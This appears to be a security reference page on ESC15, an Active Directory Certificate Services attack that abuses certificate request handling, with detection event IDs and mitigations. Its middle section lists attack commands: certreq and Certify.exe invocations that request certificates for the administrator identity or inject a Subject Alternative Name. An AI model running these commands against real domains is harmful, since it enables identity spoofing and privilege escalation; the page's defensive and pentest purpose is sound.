ESC15: Vulnerable Certificate Request Handling
ESC15 targets vulnerabilities in how certificate requests are processed and validated, potentially allowing attackers to manipulate request data and obtain unauthorized certificates.
ESC15 exploits weaknesses in how AD CS processes and validates certificate requests. If proper input validation and security controls are not in place, attackers may be able to manipulate certificate request data, potentially leading to the issuance of certificates with unauthorized attributes or for unauthorized identities.
Learn more about AD CS defense strategies to protect against this and other attacks.
- Issuance of certificates with manipulated attributes
- Potential for identity spoofing and unauthorized access
- Bypass of certificate issuance controls
- Undermining of the certificate-based trust model
- Identify vulnerabilities in certificate request handling processes
- Craft malicious certificate requests with manipulated data
- Submit manipulated requests to exploit vulnerable AD CS configurations
- Obtain unauthorized certificates with elevated privileges or false identities
When conducting AD CS penetration testing, consider the following aspects specific to ESC15: Vulnerable Certificate Request Handling:
- Identify vulnerable certificate templates and misconfigurations
- Assess the potential impact on the overall AD CS security
- Evaluate the effectiveness of existing security controls
- Test for the ability to exploit this vulnerability in the target environment
- Document findings and provide actionable remediation steps
Generate and Inspect Malicious Requests
certreq -new malicious_request.inf malicious_request.reqcertutil -dump malicious_request.reqSubmit a manipulated certificate request
certreq -submit -attrib "CertificateTemplate:User" -config "CA_SERVER\CA_NAME" malicious_request.reqUse Certify to exploit vulnerable certificate request handling
.\Certify.exe request /ca:dc.domain.com\CA-NAME /template:VulnerableTemplate /altname:administratorAttempt to exploit Subject Alternative Name (SAN) injection
certreq -submit -attrib "CertificateTemplate:User" -attrib "SAN:dns=attacker.domain.com&[email protected]" request.infCheck CA policy modules
certutil -config "CA_SERVER\CA_NAME" -getreg policy\EditFlags- Implement comprehensive logging for all certificate request activities
- Use security information and event management (SIEM) tools to monitor certificate requests
- Regularly audit certificate request logs for anomalies
- Implement alerting for unusual or potentially malicious certificate request patterns
- Conduct periodic security assessments of certificate enrollment processes
- 4886: Certificate Services approved a certificate request
- 4887: Certificate Services denied a certificate request
- 4890: The certificate manager settings for Certificate Services changed
- 5136: A directory service object was modified (for monitoring certificate request handling changes)
To mitigate ESC15: Vulnerable Certificate Request Handling and enhance overall AD CS security, consider implementing the following measures:
- Implement robust input validation for certificate requests
- Use secure protocols for certificate enrollment
- Regular security testing of certificate request handling processes
- Implement strong authentication for certificate requests
- Deploy and maintain up-to-date patch levels for AD CS components
- Regularly conduct AD CS penetration testing to identify and address vulnerabilities
- Implement the principle of least privilege across your AD CS infrastructure
- Maintain up-to-date documentation of your AD CS configuration and security policies
Related AD CS Attacks
Explore other attack vectors that target Active Directory Certificate Services:
